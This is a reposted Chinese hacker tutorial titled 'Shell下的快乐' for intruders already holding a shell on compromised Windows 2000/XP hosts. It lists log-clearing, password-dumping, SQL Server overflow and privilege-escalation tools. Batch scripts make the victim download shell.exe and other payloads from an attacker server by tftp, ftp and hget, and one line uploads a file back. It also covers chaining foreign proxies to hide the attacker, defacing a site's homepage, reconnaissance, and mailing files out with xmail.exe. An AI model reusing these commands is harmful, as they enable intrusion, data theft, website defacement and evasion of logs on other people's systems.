来源:远方网络 | 2005-8-8 15:43:49 | (有2902人读过)
Shell下的快乐 本文作者:未知 文章出处:未知 文章性质:原创 阅读次数:32 发布日期:2004-09-27 文章结构 0. 写在前面的话 1. 需要的软件列表 2. tftpd server, ftp server, http server的安装 3. 不同的通讯商的代理服务器两个sock5,简单的tcp包转发设置 4. 文件传输,及常用的命令的格式 5. 修改首页面简便方法 6. 对主机简单判断,xmail使用 7. 问题
############################################################# 0. 写在前面的话 ############################################################# 本文主要适用于microsoft的win2000,winxp 操作系统. 网上面也有这些资料. 我了稍微觉得这个周末无聊. 就把他胡乱的写一通吧! 肉鸡应该很多的. 我只是拿来测试一些工具而已.自己的是win9x没有办法了. 如果你已经得到一个shell.还不知道怎么办的话. 那就接着看吧 如果你觉得烂. 不要砸我哟 ^_^ 如果你觉得需要补充的话.请在BBS留言. 如果有空的话,在出个改进版吧!
当然,如果你觉得不错的话.可以把下面的命令自己在整理一次.作一个适合自己的文件 到时候.只需要粘贴到telnet里面.会自动执行的,真的.(笼里面的包子 ^_^)
############################################################# 1. 需要的软件列表 #############################################################
2000-01-10 20:00 17,168 tftp.exe (客户端,自带) 2000-01-09 00:00 19,728 tftpd.exe (服务端,server版本自带有) 2000-12-04 08:44 95,744 clearel.exe (清除事件纪录) 2002-06-16 02:44 33,792 elsave.exe (清除日志) 2002-08-08 22:28 32,768 findpass.exe 2000-12-19 15:42 13,312 FPipe.exe (tcp转发) 2001-05-04 13:58 114,688 fport.exe (查开放端口及关联进程) 2002-04-18 09:27 13,312 FScan.exe (扫描自己的服务器开放否) 2002-09-25 16:46 4,608 HGet.exe (下载) 2002-04-03 18:16 15,532 instsrv.exe (安装服务) 2001-05-10 12:00 19,488 nc.exe 2002-06-05 20:08 16,896 netsvc.exe (远程查询服务) 2002-04-29 18:45 131,072 Psinfo.exe (查看是否ntfs分区) 2000-02-24 02:52 77,824 pskill.exe (杀进程) 2002-08-13 12:49 86,016 pslist.exe (列进程) 2001-12-20 04:51 22,528 psu.exe (插入system进程权限) 2002-08-08 22:28 55,296 pulist.exe (列主机名/用户名/PID) 2000-09-01 17:16 39,168 sc.exe (查询服务关联进程) 1999-11-11 00:00 5,904 sclist.exe (列所有安装服务状态) 2001-12-21 20:47 132,608 Server.exe (ftp server) 2002-10-22 11:00 1,642 settings.ini(ftp server 配置文件) 2002-11-16 09:19 939 slimftpd.conf (slimftp server配置文件) 2002-07-31 15:08 18,944 SlimFTPd.exe (slimftp server) 2002-10-23 09:27 45,056 sql2.exe (sql2 1433端口溢出) 2002-04-13 20:49 32,768 sqlexeca.exe (sa空口令 sqlserver连接程序) 2002-11-19 14:59 3,796 token.exe (列主机名/用户名/PID) 2002-11-03 11:19 196,608 wget.exe (下载,可以显示速度) 2002-11-11 11:30 45,056 wnc.exe (http server) 2001-10-09 17:36 77,312 xmail.exe (可以发送附件到免费油箱) 2002-07-31 20:51 401,462 msvcp60.dll (不知道这个是否自带, 很多的程序都需要的库) 网页压缩包 china.rar
当然还需要winrar3.0版本. 这么多的软件需要压缩的. 建议先使用中文版本rar.exe 学会了.使用英文rar.exe 以上程序如果我们网站没有下载 那么就去google.com 输入 "xmail.exe" 搜索吧!
############################################################# 2. tftpd server, ftp server, http server的安装 #############################################################
tftpd server的安装 ------------------------------------------------------------- copy tftpd.exe %windir%\system32\. instsrv tftpd %windir%\system32\tftpd.exe net start tftpd echo Your file copy to ^> %SystemDrive%\tftpdroot\ dir %SystemDrive%\tftpdroot\.
ftp server的安装 ------------------------------------------------------------- slimftpd.exe 或者 server.exe
http server -------------------------------------------------------------- 我使用的apache. 压缩后1M. 好像 wmc.exe 怎么不是很顺利.
############################################################# 3. 不同的通讯商的代理服务器两个sock5,简单的tcp包转发设置 ############################################################# 一般选择台湾 日本 韩国的跳板(TB).一般是安装skserver了. 我的通讯意图是: TB:跳板主机 MB: 目标主机 CK: 仓库,放你的程序
本机telnet-->TB1(sock5)-->TB1(sock5)-->MB
控制 CK-->TB3(tcp转发)-->MB(tftp下载) 控制 CK-->TB3(tcp转发)-->MB(ftp -s:w下载) 第三 net use \ip\ipc$ "pass" /user:"username" copy *.exe \ip\admin$\.
控制 CK-->TB3(tcp转发)-->MB(wget下载) 最后大规模下载
############################################################# 4. 文件传输,及常用的命令的格式 ############################################################# 假设你的仓库服务器的ip: 202.203.x.x tftpd: 304 tftpd -> 69 UDP c:\winnt\system32\tftpd.exe
ftp server 2088 Server -> 3321 TCP C:\WINNT\system32\Server.exe
http server 2089 Server -> 808 TCP C:\WINNT\system32\wnc.exe
检查你的"仓库"是否正常工作.一般只有做fscan端口扫描了 _______________mycb.bat___________________________________ fscan -u 69 202.203.x.x fscan -p 808,3321 202.203.x.x _______________mycb.bat__END______________________________
假设你的文件都放在%SystemDrive%\tftpdroot\下面,一般也就是 c:\tftproot\ _______________mytftp.bat_____________________________________ tftp -i 202.203.x.x get hget.exe tftp -i 202.203.x.x get shell.exe tftp -i 202.203.x.x get rar.exe tftp -i 202.203.x.x get china.rar tftp -i 202.203.x.x get netsill.rar tftp -i 202.203.x.x put infoRJ.txt _______________mytftp.bat__END_______________________________
下面是ftp.exe 方式下载 ______________myftp.bat________________________________________ echo open 202.203.x.x 3321 >w echo username >>w echo password >>w echo cd /tftpdroor >>w echo pwd >>w echo binary >>w echo get hget.exe >>w echo get shell.exe >>w echo get rar.exe >>w echo get china.rar >>w echo get netsill.rar >>w echo quit >>w ftp -s:w shell.exe ______________myftp.bat__END___________________________________
最后是hget方式拖了.
______________myhget.bat_______________________________________ hget.exe ftp://username:password@202.203.x.x:3321/tftproot/shell.exe shell.exe run hget.exe ftp://username:password@202.203.x.x:3321/tftproot/rar.exe rar.exe hget.exe ftp://username:password@202.203.x.x:3321/tftproot/china.rar china.rar hget.exe ftp://username:password@202.203.x.x:3321/tftproot/netsill.rar netsill.rar ______________myhget.bat__END__________________________________
文件已经上传了.剩下的事情比较好作了.
############################################################# 5. 修改首页面 ############################################################# 如果是修改首页面. a. 找到目录 b. 确定默认首文件 c.替换默认的首文件
a. 找到目录 使用浏览器打开目标(MB)上面的网址.选者两个图片. 右键--属性--记住图片的全称 比如 isbest.gif http://www.netsill.com/bbs/pic/isbest.gif 这样的不行估计/bbs/是一个虚拟目录 LOGO.GIF http://www.netsill.com/images/LOGO.GIF 然后 __________________________ cd / dir /s logo.gif __________________________ 看看这个文件在那个目录.如果只有一个的话.恭喜你.找到目录的(退出images就可以了)
b. 确定默认首文件 寻找首页面比较偏僻的文字 比如 "我能做什么" 在刚才那个目录里面 明确扩展名称 __________________________ find /i "我能做什么" *.asp find /i "我能做什么" *.htm find /i "我能做什么" *.php __________________________ c.替换默认的首文件 自己替换就行了. 上面那个也可以直接作的.
(可能出现的问题.就是替换不成功. 曾经和 孤狼望月 发现一个网站. 怎么替换都提示没有权限 后来使用administrator-3389登陆才发现.NTFS分区.对文件夹作了设置. 只有administrator 可以只读访问后修改了完全控制. 传递给子进程. 用了半个小时才改完权限)
############################################################# 6. 对主机简单判断 ############################################################# ipconfig 是否有内部网络
netstat -n 是否有活动的网络连接.如果有80端口连接. 可能网管正在上网了. 是否有内网连接或者连接的源地址是内部网络IP. 主机作了NAT
net user administrator 最后一次登陆时间. 密码更改时间
net user guest 这个帐号有人使用吗?
sclist sclist -r sclist -s 看看有没有异常安装的服务. 然后就是重点检查可疑的服务 sc qc servicename
psinfo.exe 安装时间,运行时间.打的补丁包数字SP1,SP2,SP3. 磁盘分区格式.容量
pslist.exe 是否有*.scr屏幕保护程序运行
xmail.exe <SMTPServer> <MailFrom> <MailTo> <Filaname> [User] [Pass] xmail.exe smtp.21cn.com <MailFrom> <MailTo> <Filaname> [User] [Pass] xmail.exe smtp.263.net <MailFrom> <MailTo> <Filaname> [User] [Pass]
############################################################# 7. 问题 ############################################################# 那个TCP包转发的软件我没有详细测试.自己只作了两次而已.成功. 什么是Shell? 如果有人这样问你,你要怎么解释了?我也不知道怎么表白?也许是我的语言的苍白. 也许是我的语文没有学好. 你去下载一个icmd.exe http://www.heibai.net/download/show.php?id=1629 然后本机 icmd z 1000 运行 再开一个窗口 telnet 127.0.0.1 1000 这个1000应该可以叫着一个shell的例子吧! 应该这样解释吗??????????????????????????????????
|